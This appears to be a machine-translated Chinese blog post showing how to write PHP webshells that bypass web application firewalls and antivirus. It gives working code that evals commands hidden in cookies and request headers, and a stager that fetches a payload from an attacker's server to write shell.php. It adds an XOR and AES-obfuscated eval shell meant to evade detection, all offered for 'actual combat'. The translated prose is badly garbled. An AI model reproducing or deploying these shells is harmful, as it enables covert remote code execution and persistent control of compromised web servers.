Discussion on PHP using some functions bypass WAF

Preface ：

I wrote an article the other day , From black to white Used in this article echo A feature of the horse is to write step by step
Read the masters' comments and then studied the reasons
Learned a lot
such as linux Write shell Less
POST The reasons and solutions are as follows base64 The reason why it doesn't exist and wget and nc Why can't rebound

I also found a problem that a master said here ,${}_{P}OSTemptygridWithAnd$ These characters can't be written in I also happened to see an article written by a master in wechat official account

Links are as follows
https://mp.weixin.qq.com/s/hRwYtDZ-dqqznhS3LdSxUA
It mentioned a tips
utilize get_headers Around waf Immediately attracted their own interest , Because there are many waf Is based on post Bao He get Packets to intercept If I can control the parameter content to header Can't you pass steadily in your head
I began to study this tips For actual combat , I find it interesting to share with you here

Text

In principle ： Personally, I feel a little like a transit horse This is the limit that can be broken more .

1. The code hierarchy filters post as well as get

This kind of bypass is quite simple Go directly to session perhaps cookie Medium or headers You can bypass

#cookie The ginseng 
<?php
eval(base64_decode($_COOKIE["PHPSESSID"]));
?>
  
#session The ginseng 
  <?php

eval($_SESSION['dmeo']=base64_decode($_COOKIE["PHPSESSID"]));

?>

2. The code layer filters $ _ POST GET Content

Ideas and methods 1

utilize getallheadrs Go around
Apply to php The version is greater than 5.5 The above

<?php
  session_start();

eval(getallheaders()['Demo']);

?>

5.5 The following function doesn't seem to exist

5.5 The above

Ideas and methods 2

utilize get_headers
The server contents are as follows （ hinder base64 What's inside can become what you want like an ice scorpion base64 Encryption can also ）

<?php
header('assert');
header("file_put_contents('shell.php',base64_decode('PD9waHAgZXZhbCgkX1BPU1RbJzEnXSk7ID8+'))");

The content of Ma is as follows Apply to 7.1 following This is for assert If you want a higher version to be applicable, specify eval and assert that will do

<?php
$a=get_headers('http:// The server /1.php');
$b=str_replace(":","",$a[6]);
$b=str_replace(" ","",$b);
$x=str_replace(":","",$a[7]);
$x=str_replace(" ","",$x);
$b($x);
?>

<?php
$a=get_headers('http:// The server /1.php');
$x=str_replace(":","",$a[7]);
$x=str_replace(" ","",$x);
eval($x);
?>

And then visit 3.php Can be created successfully shell.php

d Shield killing effect 1

There is no exemption here If you want to do static and dynamic free killing In fact, it can be Just change it a little
It can be improved by combining this encryption algorithm Dynamic can pass
Throw a brick for everyone to throw an encryption algorithm +shellcode Static immunity Dynamic passable 60 Just change it with this one
This is the encryption algorithm a.php

<?php
$key1 = '123456';
$key = "password";
$fun = $_GET['func'];
for($i=0;$i<strlen($fun);$i++){
    
    $fun[$i] = $fun[$i]^$key[$i+1&7];
}
echo $fun;
$encrypt = openssl_encrypt($fun, 'AES-128-ECB', $key1, 0);
echo " After encryption ： ".$encrypt;
?>

This is shellcode Of
shell.php

 <?php

function b(){
    
    $x = "password";
    $key1 = '123456';
    $fun = openssl_decrypt($_GET['func'], 'AES-128-ECB', $key1, 0);
    for($i=0;$i<strlen($fun);$i++){
    
    $z= $fun[$i] ;
    $fun[$i] =$z^$x[$i+1&7];
}
return $fun;
}

function a(){
    
  eval(b());
}

a();

actual combat

Combine with the idea of adding Write the content step by step, and you can finish it
Write the content after adding it for many times Then access to get shell 了